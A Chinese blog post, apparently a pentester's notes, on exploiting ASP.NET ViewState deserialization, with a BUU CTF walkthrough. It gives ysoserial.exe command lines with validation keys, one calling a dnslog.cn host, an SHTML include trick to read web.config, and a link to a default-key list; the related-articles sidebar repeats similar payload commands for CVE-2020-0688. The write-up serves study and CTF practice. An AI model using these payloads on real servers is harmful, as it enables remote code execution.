ASP.NET在ViewState中反序列化利用

最新推荐文章于 2023-12-28 08:30:00 发布
最新推荐文章于 2023-12-28 08:30:00 发布
阅读量1.5k 收藏
点赞数
分类专栏: 渗透之路 文章标签: 渗透 asp.net 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/108923998
版权

ASP.NET在ViewState中反序列化利用

做项目学到一手记录下

viewstate是什么

  1. 按键名称存储每个控件的值,如哈希表
  2. 跟踪对视图状态值的初始状态的更改
  3. 序列化和取消序列化保存的数据到客户端上的隐藏窗体字段
  4. 自动恢复回贴的 ViewState 数据
  • ASP.NET 支持三种不同的开发模式:
    Web Pages(Web 页面)、MVC(Model View Controller 模型-视图-控制器)、Web Forms(Web 窗体)基于 web forms ,目的是为服务端控件状态进行持久化 。

ASP.NET Web应用顺序运用ViewState来庇护页面状况,并在Web表单中保存数据。ViewState参数是Base64序列化后的餐胡,一般会在POST请求中经由历程名为“__VIEWSTATE”的隐蔽参数发送。在效劳器端,将对这个参数举行反序列化,并检索数据。

利用条件

1.得到 validationKey 验证密钥 以及 validation 验证方法或者web.config某种途径的泄露
2.禁用MAC验证功能
默认key合集https://github.com/yuanhaiGreg/Fuzz-Dict/blob/master/ViewState_Key.txt

利用方式

利用ysoserialg工具生成viewstate payload

在这里插入图片描述

针对.NET Framwork 4.5及以上版本:

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"

针对.NET Framwork 4.0及以上版本

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping p0xxwc.dnslog.cn" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"

如果不知道_VIEWSTATEGENNERATOR参数,就需要知道其路径–path="/somepath/testaspx/test.aspx" --apppath="/testaspx/"

buu某ctf

在这里插入图片描述

题目给出了源码,文件上传黑名单的绕过上传ctm文件

<!-- test.shtml -->
<!--#include file="/web.config" -->

最后读到上面的配置文件,key也知道了

随便post一个包过去

在这里插入图片描述

现在知道viewstate及相关值了,然后ysorial工具

在这里插入图片描述

弹个shell就ok

参考文章:
https://www.4hou.com/posts/GYq7
https://github.com/Illuminopi/RCEvil.NET
https://github.com/pwntester/ysoserial.net

humble嘻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mojarra JSF ViewState 反序列化漏洞复现
0xSec
01-10 1442
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE使用。
cve-2020-0688:cve-2020-0688
04-14
cve-2020-0688 cve-2020-0688 使用具有电子邮件地址特权的用户登录无需担心。 抓取-页面源的__VIEWSTATEGENERATOR抓取ASP.NET_SessionId值的ASP.NET_SessionId cookie的值 ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" -
[转]真正理解ASP.NETViewState
weixin_30296405的博客
03-08 185
转自:http://blog.csdn.net/vividboy/archive/2008/01/28/2069347.aspx 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其我会同时用一些例子说明我文章的观点,结论。比如我会用静态控件(dec...
ASP.Net ViewState的实现
timmy3310的专栏
03-31 2517
  ViewState是.Net提出的状态保存的一种新途径(实际上也是老瓶装新酒);我们知道,传统的Web程序保存状态的方式有这样几种:  1、Application 这是Web应用程序生命期的全局保存区,保存在Application的数据是全局有效的;在Asp.Net,有一个应用程序池,其保存了数个(或数十个)应用程序实例,每一次请求都会从池取一个实例来处理请求,在请求完毕之前,这个
Mojarra JSF ViewState 反序列化漏洞
EC_Carrot的博客
07-13 625
漏洞复现 我们使用ysoserial的Jdk7u21利用链来生成一段payload: java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0 我这里用的是vulhub的环境,访问your_ip:8080可以看到demo页面 抓包后修改javax.faces.ViewState的值为payload,payload记得要url编码 返回容器查看 ...
vulhub漏洞复现39_Mojarra
weixin_44193247的博客
02-09 653
vulhub漏洞复现练习篇
asp.net viewstate 反序列化攻击 学习记录
qq_41891666的博客
07-13 5521
0x00 前言 asp.net 平时接触得少,ctf 也比较少遇到,之前对他的了解也只限于对 c# 语言的一些简单学习。然后这次在 buu 上面遇到 一道 [BJDCTF 2nd]EasyAspDotNet 题,然后在看wp 的时候,又碰巧了解到 HITCON CTF 2018 - Why so Serials? 和这题差不到,都是利用viewstate 反序列化来做;然后在查资料的时候,又发现 CVE-2020-0688 exchange远程代码执行漏洞 也是利用viewstate 反序列化漏洞。
php5.5 反序列化利用工具_如何借助ViewStateASP.NET实现反序列化漏洞利用
weixin_39870092的博客
11-24 1005
概述ASP.NET Web应用程序使用ViewState来维护页面状态,并在Web表单保留数据。ViewState参数是Base64序列化后的餐胡,通常会在POST请求通过名为“__VIEWSTATE”的隐藏参数发送。在服务器端,将对这个参数进行反序列化,并检索数据。通常可以在Web服务器上运行可以伪造有效ViewState的代码。这一过程可以在禁用MAC验证功能或掌握以下内容的情...
ASP.NET Web Forms - ViewState(视图状态)
weixin_45582785的博客
05-07 1027
维持 ViewState(视图状态) 在经典 ASP ,当一个表单被提交时,所有的表单值都会被清空。假设您提交了一个带有大量信息的表单,而服务器返回了一个错误。您不得不回到表单改正信息。您点击返回按钮,然后发生了什么…所有表单值都被清空了,您不得不重新开始所有的一切! 在 ASP .NET ,当一个表单被提交后,表单会连同表单值一起出现在浏览器窗口。如何做到的呢?这是因为 ASP .NET ...
CVE-2020-0688 Exchange 远程代码执行分析
smellycat000的专栏
03-01 1095
聚焦源代码安全,网罗国内外最新资讯!关于如何利用该漏洞,ZDI的博客已有介绍。但是关于这个漏洞的细节还未看到有更多的披露。本篇将补充分析该漏洞的细节。01.漏洞简介Microsoft...
asp.netViewState的用法详解
10-23
本文给大家介绍asp.netviewstate的用法,涉及到viewstate的原理、用法、与session的对比等方面的知识,对viewstate用法感兴趣的朋友一起看看吧
asp.net 禁用viewstate在web.config里
10-29
在web.config里设置禁用viewstate的代码。
asp.net 去除viewstate第1/2页
10-30
生成了这么多的一段东西,这段东西对seo一点好处也没有。而我要做的就是去掉它,但有一点,去掉但不能让它原来的控件和内容都发生变化
.NET高级代码审计(第十一课) LosFormatter反序列化漏洞
最新发布
ahhacker86的专栏
12-28 988
为了帮助研发大佬们熟悉和掌握.NET应用安全相关的漏洞介绍和修复解决方案,我们创建了一个.NET应用安全建设的星球,专门科普.NET领域相关的安全漏洞和提供漏洞修复方法,星球部分主题如下图所示。格式序列化,此类支持序列化的任何对象图。另外如果对.NET安全攻防技术研究和渗透感兴趣的朋友们,可以扫下面的dot.Net安全矩阵星球二维码,加入我们。由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《
ViewState机制由浅入深
rongtou的专栏
05-08 2259
1         ViewState机制是什么?ViewState机制是asp.net对同一个Page的多次请求(PostBack)之间维持Page及控件状态的一种机制。在WebForm每次请求完,Page对象都会被释放,对同一个Page的多次请求之间的状态信息,如何进行维护呢?WebForm,每次请求都会存在客户端和服务器之间的一个交互。如果请求完成之后将一些信息传回到客户端,下次请
C#反序列化漏洞
m0_47968686的博客
08-20 1513
CVE-2020-0688反序列化漏洞 漏洞成因 漏洞产生的主要原因就是在Exchange ECP组件发现,邮件服务在安装的过程不会随机生成秘钥,也就是说所有默认安装的Exchange服务器的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥伪造__VIEWSTATE参数从而触发反序列化漏洞。 环境、工具 WinServer2016、Exchange Server2016、win10、dnspy 分析 default.aspx被解析,继承Page类(Page
危】未加密的__VIEWSTATE参数
天泽岁月
11-17 5169
危】未加密的__VIEWSTATE参数
asp.net viewstate 有什么作用
05-30
ASP.NETViewstate是一个用于存储页面状态的机制,它可以让ASP.NET Web Forms应用程序在处理页面的postback请求时,保留在页面上输入的数据和其他控件的状态信息。 Viewstate的作用是将页面上的控件状态以及其他需要在postback请求保存的数据,以一种隐藏的方式保存在页面,以便在下一次页面加载时,ASP.NET Web Forms应用程序可以还原这些状态信息,从而使得页面在处理postback请求时,能够正确地显示之前的状态。 Viewstate的实现方式是将控件的状态信息序列化为一个Base64编码的字符串,并存储在隐藏的input元素,该元素的名称为“__VIEWSTATE”。在处理postback请求时,ASP.NET框架会自动读取这个隐藏的input元素,将其反序列化为控件的状态信息,并还原控件的状态。 需要注意的是,Viewstate机制会在每个postback请求增加页面的大小,并且在处理大型页面时可能会导致性能问题。因此,在设计ASP.NET Web Forms应用程序时,需要谨慎使用Viewstate,并尽量减少Viewstate所存储的数据量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值